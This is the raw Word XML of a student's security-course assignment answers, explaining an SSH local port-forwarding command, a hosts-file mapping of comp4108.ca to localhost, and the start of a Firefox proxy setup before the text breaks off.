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1E1798" w14:textId="77777777" w:rsidR="0019740A" w:rsidRDefault="0019740A" w:rsidP="0019740A">
      <w:pPr>
        <w:pStyle w:val="NoSpacing"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="417C1921" w14:textId="77777777" w:rsidR="0019740A" w:rsidRDefault="0019740A" w:rsidP="0019740A">
      <w:pPr>
        <w:pStyle w:val="NoSpacing"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="50DCEB04" w14:textId="77777777" w:rsidR="0019740A" w:rsidRDefault="0019740A" w:rsidP="0019740A">
      <w:pPr>
        <w:pStyle w:val="NoSpacing"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4630E519" w14:textId="77777777" w:rsidR="0019740A" w:rsidRDefault="0019740A" w:rsidP="0019740A">
      <w:pPr>
        <w:pStyle w:val="NoSpacing"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5CD1D875" w14:textId="77777777" w:rsidR="0019740A" w:rsidRDefault="0019740A" w:rsidP="0019740A">
      <w:pPr>
        <w:pStyle w:val="NoSpacing"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7969DB50" w14:textId="77777777" w:rsidR="0019740A" w:rsidRDefault="0019740A" w:rsidP="0019740A">
      <w:pPr>
        <w:pStyle w:val="NoSpacing"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6D0F91F5" w14:textId="77777777" w:rsidR="0019740A" w:rsidRDefault="0019740A" w:rsidP="0019740A">
      <w:pPr>
        <w:pStyle w:val="NoSpacing"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="095F54A0" w14:textId="77777777" w:rsidR="0019740A" w:rsidRDefault="0019740A" w:rsidP="0019740A">
      <w:pPr>
        <w:pStyle w:val="NoSpacing"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="293E31E7" w14:textId="77777777" w:rsidR="0019740A" w:rsidRDefault="0019740A" w:rsidP="0019740A">
      <w:pPr>
        <w:pStyle w:val="NoSpacing"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="520D3219" w14:textId="77777777" w:rsidR="0019740A" w:rsidRDefault="0019740A" w:rsidP="0019740A">
      <w:pPr>
        <w:pStyle w:val="NoSpacing"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5F47D859" w14:textId="77777777" w:rsidR="0019740A" w:rsidRDefault="0019740A" w:rsidP="0019740A">
      <w:pPr>
        <w:pStyle w:val="NoSpacing"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6243C46B" w14:textId="77777777" w:rsidR="0019740A" w:rsidRDefault="0019740A" w:rsidP="0019740A">
      <w:pPr>
        <w:pStyle w:val="NoSpacing"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5CD320E6" w14:textId="77777777" w:rsidR="0019740A" w:rsidRDefault="0019740A" w:rsidP="0019740A">
      <w:pPr>
        <w:pStyle w:val="NoSpacing"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2AA20434" w14:textId="77777777" w:rsidR="0019740A" w:rsidRDefault="0019740A" w:rsidP="0019740A">
      <w:pPr>
        <w:pStyle w:val="NoSpacing"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="248800E8" w14:textId="77777777" w:rsidR="0019740A" w:rsidRDefault="0019740A" w:rsidP="0019740A">
      <w:pPr>
        <w:pStyle w:val="NoSpacing"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="109778BC" w14:textId="4D2B678D" w:rsidR="0019740A" w:rsidRDefault="0019740A" w:rsidP="0019740A">
      <w:pPr>
        <w:pStyle w:val="NoSpacing"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>COMP 4108 Assignment 4</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1DFF7D78" w14:textId="77777777" w:rsidR="0019740A" w:rsidRDefault="0019740A" w:rsidP="0019740A">
      <w:pPr>
        <w:pStyle w:val="NoSpacing"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:t>Shane Bishop</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6D7D2EC5" w14:textId="77777777" w:rsidR="0019740A" w:rsidRDefault="0019740A" w:rsidP="0019740A">
      <w:pPr>
        <w:pStyle w:val="NoSpacing"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="majorHAnsi" w:cstheme="majorBidi"/>
          <w:color w:val="2F5496" w:themeColor="accent1" w:themeShade="BF"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:t>Student #: 101030053</w:t>
      </w:r>
      <w:r>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="76783506" w14:textId="77777777" w:rsidR="0019740A" w:rsidRDefault="0019740A" w:rsidP="0019740A">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>Part A</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4090C335" w14:textId="687B6BF1" w:rsidR="0019740A" w:rsidRDefault="0019740A" w:rsidP="0019740A">
      <w:pPr>
        <w:pStyle w:val="NoSpacing"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Question 1</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="61E8E932" w14:textId="05D2903C" w:rsidR="0019740A" w:rsidRDefault="0019740A" w:rsidP="0019740A">
      <w:pPr>
        <w:pStyle w:val="NoSpacing"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">My local machine is running Windows. I </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>don’t</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t xml:space="preserve"> like PuTTY much, so I used git-bash for Windows to set up port forwarding.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="79F3FC40" w14:textId="1C0FACEE" w:rsidR="0019740A" w:rsidRDefault="0019740A" w:rsidP="0019740A">
      <w:pPr>
        <w:pStyle w:val="NoSpacing"/>
      </w:pPr>
      <w:r w:rsidRPr="0019740A">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="23A4E335" wp14:editId="07AD3D27">
            <wp:extent cx="4820323" cy="247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20323" cy="247685"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="56FAEE64" w14:textId="77777777" w:rsidR="0019740A" w:rsidRDefault="0019740A" w:rsidP="0019740A">
      <w:pPr>
        <w:pStyle w:val="NoSpacing"/>
      </w:pPr>
      <w:r>
        <w:t>I ran this command at my git-bash prompt.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="373B61F0" w14:textId="77777777" w:rsidR="0019740A" w:rsidRDefault="0019740A" w:rsidP="0019740A">
      <w:pPr>
        <w:pStyle w:val="NoSpacing"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2069DCF0" w14:textId="73985D2C" w:rsidR="0019740A" w:rsidRDefault="0019740A" w:rsidP="0019740A">
      <w:pPr>
        <w:pStyle w:val="NoSpacing"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">The </w:t>
      </w:r>
      <w:r w:rsidRPr="00CA35B5">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
        </w:rPr>
        <w:t>-</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00CA35B5">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
        </w:rPr>
        <w:t>fNT</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> has the following breakdown:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3C53AAE6" w14:textId="1FC068A7" w:rsidR="0019740A" w:rsidRDefault="0019740A" w:rsidP="0019740A">
      <w:pPr>
        <w:pStyle w:val="NoSpacing"/>
      </w:pPr>
      <w:r w:rsidRPr="00CA35B5">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
        </w:rPr>
        <w:t>-f</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> means run </w:t>
      </w:r>
      <w:r w:rsidRPr="00CA35B5">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
        </w:rPr>
        <w:t>ssh</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> in the background just before command execution.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="22D7358C" w14:textId="5E34FCFE" w:rsidR="0019740A" w:rsidRDefault="0019740A" w:rsidP="0019740A">
      <w:pPr>
        <w:pStyle w:val="NoSpacing"/>
      </w:pPr>
      <w:r w:rsidRPr="00CA35B5">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
        </w:rPr>
        <w:t>-N</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> means do not execute a remote command. The </w:t>
      </w:r>
      <w:r w:rsidRPr="00CA35B5">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
        </w:rPr>
        <w:t>ssh</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> man page specifically says this is useful for just forwarding ports.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="31DA95BC" w14:textId="614F78A0" w:rsidR="0019740A" w:rsidRDefault="0019740A" w:rsidP="0019740A">
      <w:pPr>
        <w:pStyle w:val="NoSpacing"/>
      </w:pPr>
      <w:r w:rsidRPr="00CA35B5">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
        </w:rPr>
        <w:t>-T</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> disables pseudo-</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>tty</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> allocation.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4BC74E57" w14:textId="77777777" w:rsidR="0019740A" w:rsidRDefault="0019740A" w:rsidP="0019740A">
      <w:pPr>
        <w:pStyle w:val="NoSpacing"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="40D38DE8" w14:textId="135495F7" w:rsidR="0019740A" w:rsidRDefault="0019740A" w:rsidP="0019740A">
      <w:pPr>
        <w:pStyle w:val="NoSpacing"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">I used </w:t>
      </w:r>
      <w:r w:rsidRPr="00CA35B5">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
        </w:rPr>
        <w:t>-</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00CA35B5">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
        </w:rPr>
        <w:t>fNT</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> to be able to run </w:t>
      </w:r>
      <w:r w:rsidRPr="00CA35B5">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
        </w:rPr>
        <w:t>ssh</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> in a mode more convenient for port forwarding. If I did not use these extra flags, I would have started a regular </w:t>
      </w:r>
      <w:r w:rsidRPr="00CA35B5">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
        </w:rPr>
        <w:t>ssh</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> session with a full shell, and then I would need to make sure I </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>didn’t</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t xml:space="preserve"> terminate the </w:t>
      </w:r>
      <w:r w:rsidRPr="00CA35B5">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
        </w:rPr>
        <w:t>ssh</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> session.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3E580A0F" w14:textId="5286A82E" w:rsidR="0019740A" w:rsidRDefault="0019740A" w:rsidP="0019740A">
      <w:pPr>
        <w:pStyle w:val="NoSpacing"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="12EED889" w14:textId="15658C98" w:rsidR="0019740A" w:rsidRDefault="0019740A" w:rsidP="0019740A">
      <w:pPr>
        <w:pStyle w:val="NoSpacing"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Next, I have </w:t>
      </w:r>
      <w:r w:rsidRPr="00CA35B5">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
        </w:rPr>
        <w:t>-L 9999:127.0.0.1:80</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">. This tells </w:t>
      </w:r>
      <w:r w:rsidRPr="00CA35B5">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
        </w:rPr>
        <w:t>ssh</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> to forward requests sent to 127.0.0.1:9999 on my local machine to port 80 on the remote host</w:t>
      </w:r>
      <w:r w:rsidR="00D63BAF">
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="73CF5B30" w14:textId="74EA3493" w:rsidR="00D63BAF" w:rsidRDefault="00D63BAF" w:rsidP="0019740A">
      <w:pPr>
        <w:pStyle w:val="NoSpacing"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="57EFDA38" w14:textId="24DB5EB3" w:rsidR="00D63BAF" w:rsidRDefault="00D63BAF" w:rsidP="0019740A">
      <w:pPr>
        <w:pStyle w:val="NoSpacing"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Finally, </w:t>
      </w:r>
      <w:r w:rsidRPr="00CA35B5">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
        </w:rPr>
        <w:t>student@134.117.129.207</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> tells </w:t>
      </w:r>
      <w:r w:rsidRPr="00CA35B5">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
        </w:rPr>
        <w:t>ssh</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> to connect to </w:t>
      </w:r>
      <w:r w:rsidRPr="00D63BAF">
        <w:t>134.117.129.207</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> as the user </w:t>
      </w:r>
      <w:r w:rsidRPr="00CA35B5">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
        </w:rPr>
        <w:t>student</w:t>
      </w:r>
      <w:r>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0ECCB606" w14:textId="5E6FB21C" w:rsidR="00D63BAF" w:rsidRDefault="00D63BAF" w:rsidP="0019740A">
      <w:pPr>
        <w:pStyle w:val="NoSpacing"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2DFB42F3" w14:textId="032A706C" w:rsidR="00D63BAF" w:rsidRPr="00D63BAF" w:rsidRDefault="00D63BAF" w:rsidP="0019740A">
      <w:pPr>
        <w:pStyle w:val="NoSpacing"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Question 2</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="248B7103" w14:textId="4F451B4B" w:rsidR="00D63BAF" w:rsidRDefault="00D63BAF" w:rsidP="0019740A">
      <w:pPr>
        <w:pStyle w:val="NoSpacing"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Question 2 </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>isn’t</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t xml:space="preserve"> worth any marks, but here’s a screenshot of viewing the webpage on my local machine on my browser:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="69824F2F" w14:textId="0EC31FD4" w:rsidR="00D63BAF" w:rsidRDefault="00D63BAF" w:rsidP="0019740A">
      <w:pPr>
        <w:pStyle w:val="NoSpacing"/>
      </w:pPr>
      <w:r w:rsidRPr="00D63BAF">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="1191989E" wp14:editId="19989CC6">
            <wp:extent cx="3572374" cy="2838846"/>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72374" cy="2838846"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="6EA8B336" w14:textId="34FB513D" w:rsidR="00D63BAF" w:rsidRDefault="00D63BAF" w:rsidP="0019740A">
      <w:pPr>
        <w:pStyle w:val="NoSpacing"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="28685798" w14:textId="7B830E00" w:rsidR="00D63BAF" w:rsidRDefault="00D63BAF" w:rsidP="0019740A">
      <w:pPr>
        <w:pStyle w:val="NoSpacing"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Question 3</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6DBD05B7" w14:textId="3E80BFEB" w:rsidR="00D63BAF" w:rsidRDefault="00D63BAF" w:rsidP="0019740A">
      <w:pPr>
        <w:pStyle w:val="NoSpacing"/>
      </w:pPr>
      <w:r w:rsidRPr="00D63BAF">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="38AC5017" wp14:editId="4589474A">
            <wp:extent cx="4963218" cy="209579"/>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3218" cy="209579"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="6C4F72A2" w14:textId="36E6BF65" w:rsidR="00D63BAF" w:rsidRDefault="00D63BAF" w:rsidP="0019740A">
      <w:pPr>
        <w:pStyle w:val="NoSpacing"/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>This command is essentially the same as the one used in question 1, except now both the local and remote ports are 3000.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4D496141" w14:textId="1324D31B" w:rsidR="00D63BAF" w:rsidRDefault="00D63BAF" w:rsidP="0019740A">
      <w:pPr>
        <w:pStyle w:val="NoSpacing"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="06C37A25" w14:textId="1B5EAC68" w:rsidR="00D63BAF" w:rsidRPr="00D63BAF" w:rsidRDefault="00D63BAF" w:rsidP="0019740A">
      <w:pPr>
        <w:pStyle w:val="NoSpacing"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D63BAF">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">Question </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>4</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5B7B50E6" w14:textId="7C5E4ABC" w:rsidR="00D63BAF" w:rsidRDefault="00D63BAF" w:rsidP="0019740A">
      <w:pPr>
        <w:pStyle w:val="NoSpacing"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Question 4 </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>isn’t</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t xml:space="preserve"> worth any marks, but here’s a screenshot of accessing the page in my browser:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="48660043" w14:textId="5AA4F4AE" w:rsidR="00D63BAF" w:rsidRDefault="00D63BAF" w:rsidP="0019740A">
      <w:pPr>
        <w:pStyle w:val="NoSpacing"/>
      </w:pPr>
      <w:r w:rsidRPr="00D63BAF">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="588FD9D9" wp14:editId="21A539BE">
            <wp:extent cx="5734850" cy="378195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4850" cy="3781953"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="054B9C11" w14:textId="08DDA08F" w:rsidR="00D63BAF" w:rsidRDefault="00D63BAF" w:rsidP="0019740A">
      <w:pPr>
        <w:pStyle w:val="NoSpacing"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0B9E49F8" w14:textId="77777777" w:rsidR="00CA35B5" w:rsidRDefault="00CA35B5">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="3965354A" w14:textId="41C3B25C" w:rsidR="00D63BAF" w:rsidRDefault="00D63BAF" w:rsidP="0019740A">
      <w:pPr>
        <w:pStyle w:val="NoSpacing"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>Question 5</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5254CB3C" w14:textId="7A8B1755" w:rsidR="00D63BAF" w:rsidRDefault="00E5102B" w:rsidP="0019740A">
      <w:pPr>
        <w:pStyle w:val="NoSpacing"/>
      </w:pPr>
      <w:r w:rsidRPr="00E5102B">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="552AF7C9" wp14:editId="50918AEA">
            <wp:extent cx="5943600" cy="5142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142865"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="450B2066" w14:textId="37483660" w:rsidR="00E5102B" w:rsidRDefault="00E5102B" w:rsidP="0019740A">
      <w:pPr>
        <w:pStyle w:val="NoSpacing"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">I edited my </w:t>
      </w:r>
      <w:r w:rsidRPr="00CA35B5">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
        </w:rPr>
        <w:t>C:\Windows\System32\drivers\etc\hosts</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> file using Notepad++ in Administrator mode (the file is a protected file that cannot be edited by my regular user account). The lines I added are lines 23-25 in the screenshot above.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="685ADA56" w14:textId="63CE5F72" w:rsidR="00E5102B" w:rsidRDefault="00E5102B" w:rsidP="0019740A">
      <w:pPr>
        <w:pStyle w:val="NoSpacing"/>
      </w:pPr>
      <w:r w:rsidRPr="00E5102B">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="651457A7" wp14:editId="58738BFD">
            <wp:extent cx="5544324" cy="44773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4324" cy="447737"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="7F307FE3" w14:textId="2F6D310D" w:rsidR="00E5102B" w:rsidRDefault="00E5102B" w:rsidP="0019740A">
      <w:pPr>
        <w:pStyle w:val="NoSpacing"/>
      </w:pPr>
      <w:r>
        <w:t>As stated in the comments in the file, this file maps IP addresses to hostnames. So I put 127.0.0.1 on the left and comp4108.ca on the right to map the 12.0.0.1 IP address to the hostname comp4108.ca.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0AFF8110" w14:textId="07070547" w:rsidR="00E5102B" w:rsidRDefault="00E5102B" w:rsidP="0019740A">
      <w:pPr>
        <w:pStyle w:val="NoSpacing"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="33622CB1" w14:textId="433D9EF7" w:rsidR="00E5102B" w:rsidRDefault="00E5102B" w:rsidP="0019740A">
      <w:pPr>
        <w:pStyle w:val="NoSpacing"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Question 6</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2E0847C4" w14:textId="72E77B7B" w:rsidR="00E5102B" w:rsidRDefault="00E5102B" w:rsidP="0019740A">
      <w:pPr>
        <w:pStyle w:val="NoSpacing"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Question 6 </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>isn’t</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t xml:space="preserve"> worth any marks.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="357909BB" w14:textId="7F772212" w:rsidR="00E5102B" w:rsidRDefault="00E5102B" w:rsidP="0019740A">
      <w:pPr>
        <w:pStyle w:val="NoSpacing"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="18631643" w14:textId="560C5AEA" w:rsidR="00E5102B" w:rsidRDefault="00E5102B" w:rsidP="0019740A">
      <w:pPr>
        <w:pStyle w:val="NoSpacing"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Question 7</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="33089D13" w14:textId="5AD81E40" w:rsidR="00E5102B" w:rsidRDefault="00E5102B" w:rsidP="0019740A">
      <w:pPr>
        <w:pStyle w:val="NoSpacing"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Question 7 </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>isn’t</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t xml:space="preserve"> worth any marks.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="300D5777" w14:textId="0AE13E62" w:rsidR="00E5102B" w:rsidRDefault="00E5102B" w:rsidP="0019740A">
      <w:pPr>
        <w:pStyle w:val="NoSpacing"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7E22FA62" w14:textId="1AF3AC15" w:rsidR="00E5102B" w:rsidRDefault="00E5102B" w:rsidP="0019740A">
      <w:pPr>
        <w:pStyle w:val="NoSpacing"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Question 8</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="566417B9" w14:textId="5A257B99" w:rsidR="0091112D" w:rsidRDefault="0091112D" w:rsidP="0019740A">
      <w:pPr>
        <w:pStyle w:val="NoSpacing"/>
      </w:pPr>
      <w:r>
        <w:t>I configured my Firefox proxy settings like this:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0695C7DD" w14:textId="6B038B19" w:rsidR="0091112D" w:rsidRDefault="0091112D" w:rsidP="0019740A">
      <w:pPr>
        <w:pStyle w:val="NoSpacing"/>
      </w:pPr>
      <w:r w:rsidRPr="0091112D">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
